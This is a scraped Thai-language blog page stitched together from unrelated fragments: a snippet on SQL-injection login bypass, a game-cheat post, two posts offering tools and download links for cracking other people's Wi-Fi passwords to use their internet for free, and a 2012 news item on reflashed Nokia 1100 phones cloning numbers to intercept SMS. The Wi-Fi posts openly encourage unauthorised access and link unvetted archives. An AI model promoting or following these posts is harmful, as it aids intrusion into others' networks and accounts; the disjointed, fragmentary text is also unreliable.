ดังนั้นหากคุณลอง กรอก username password ดังรูปที่ 2 จะเห็นได้ว่า ผลลัพธ์จะเป็นจริงเสมอ
ดังนั้นการทำงานของคุณอาจจะผิดพลาดได้ หาก logic ในการ login ไม่ได้ทำการตรวจสอบจำนวนที่แน่นอนใน recordset ที่ได้มา



Nothing for guest!

ข้อมูลจาก ruk-com.in.th

โกง Hack maplestory adventures 1.15.2.1 เกม fackbook (สอน+โปรแกรม)Update 26/11

ข้อมูลสรุปนี้ไม่พร้อมใช้งาน โปรด คลิกที่นี่เพื่อดูโพสต์

Hackเล่นเน็ตที่ไหนก็ได้ + วิธีใช้อย่างละเอียด

Hackเล่นเน็ตที่ไหนก็ได้  + วิธีใช้อย่างละเอียด

มีทั้งหมด 4 โปรแกรมนะครับ อยากให้ลองใช้ดูทุกตัว เพราะไฟล์มันเล็ก วิธีใช้ด้านในครับ

ทดลองใช้ค้นหาพาสของ wifi ทั่วไป ได้ประมาน 90 เปอ นะคับ แหะๆ

http://www.duckload.com/download/3162299/aircrack-ng-0_1_.9.3-win.rar

http://www.duckload.com/download/3162391/Hack_Wireless.rar

http://www.duckload.com/download/3162439/HackWireless.rar

http://www.duckload.com/download/3162453/WIRELESS.rar

http://www.duckload.com/download/3162485/_.rar

credit zeed5

ข้อมูลจาก ruk-com.in.th

วันพุธที่ 1 กุมภาพันธ์ พ.ศ. 2555

อยากรู้ไหมทำไม โนเกีย 1100 มือถือจอขาวดำจึงมีราคาพุ่งสูงถึงเครื่องละแสนบาท!



แต่เป็นจำเลยใหญ่ไปแล้วกับ “โนเกีย 1100″ มือ ถือจอขาวดำสุดคลาสสิก ฟีเจอร์สุดเบบี้ มีไฟฉายติดมาด้วย ถึงแม้จะตกรุ่นไปนานแล้ว แต่กำลังเป็นที่ต้องการอย่างมาก (อีกครั้ง) ในขณะนี้

อย่างไรก็ดี ด้วยความที่มันไม่มีลูกเล่นอะไรที่พิศดารเลยนี่เอง ประกอบกับราคาสุดถูงในบรรดามือถือแบรนด์โนเกียทั้งหมด จึงทำให้ “โนเกีย 1100″ มือถือที่เปิดตัวเมื่อ 6 ปีที่แล้วด้วยราคาหลัก 1000 บาทต้นๆ ในไทย กลายเป็นมือถือที่ขายไปทั่วโลก ขายไปแล้วกว่า 200 ล้านเครื่อง!!! และวันนี้มันก็มลายหายไปจากตลาดเป็นที่เรียบร้อย

แต่หารู้ไม่ว่า วันนี้ “โนเกีย 1100″ มีค่าหลักแสนบาท! ไม่ใช่เพราะผู้ออกแบบเสียชีวิตลง แต่เป็นเพราะมันคืออาวุธชิ้นสำคัญ ที่แฮคเกอร์จะคว้าเงินล้านลงกระเป๋าตัวเองได้ แต่สิ่งที่สำคัญมากๆ ก็คือ “โนเกีย 1100″ เครื่องนั้นจะต้องผลิตจากเมือง Bochum เยอรมัน เท่านั้น

อยากรู้ว่าทำไมจึงเป็นเช่นนั้น และพวกแฮคเกอร์จะใช้มือถือทรงแท่งหน้าตาเชยๆ นั้นทำอะไร เชิญกวาดตาไปบรรทัดต่อไปทันที!

วิธีการคือ เหล่าแฮคเกอร์จะนำมือถือรุ่นนี้ ผลิตจากที่เยอรมันนี่ มารันโปรแกรมลงไปใหม่ เพื่อให้มันสามารถใช้เบอร์เดียวกับมือถือเครื่องอื่นได้ นั่นก็หมายความว่า ข้อความ SMS ใดๆ ที่เบอร์มือถือต้นฉบับได้ มือถือโนเกีย 1100 เครื่องที่ก๊อปปี้มาก็จะได้รับเช่นเดียวกัน

สอนวิธีการ hack wireless ใช้แบบฟรีๆเลยครับ [หากซ้ำก้อขออภัย]

 ::) ::) ::)
สำหรับท่านที่บ้านหรือที่ไหนๆที่มีสัญญาณไวเลสแต่เขาล๊อกพาสเวิสไว้ลองมาดูวิธีนี้ดูครับท่านอาจจะได้ใช้เนตแบบฟรีๆไม่อั้นก็ได้ครับ

เป็นไฟล์เวิดนะครับดาวโหลดแล้วไปปริ้นอ่านกันได้เลยครับ

คู่มือ



โปรแกรม [4.0 mb]

 

หรือ



ถ้าไม่ได้ ก้อ Copy Link เอานะคร้าบ

ข้อมูลจาก ruk-com.in.th
;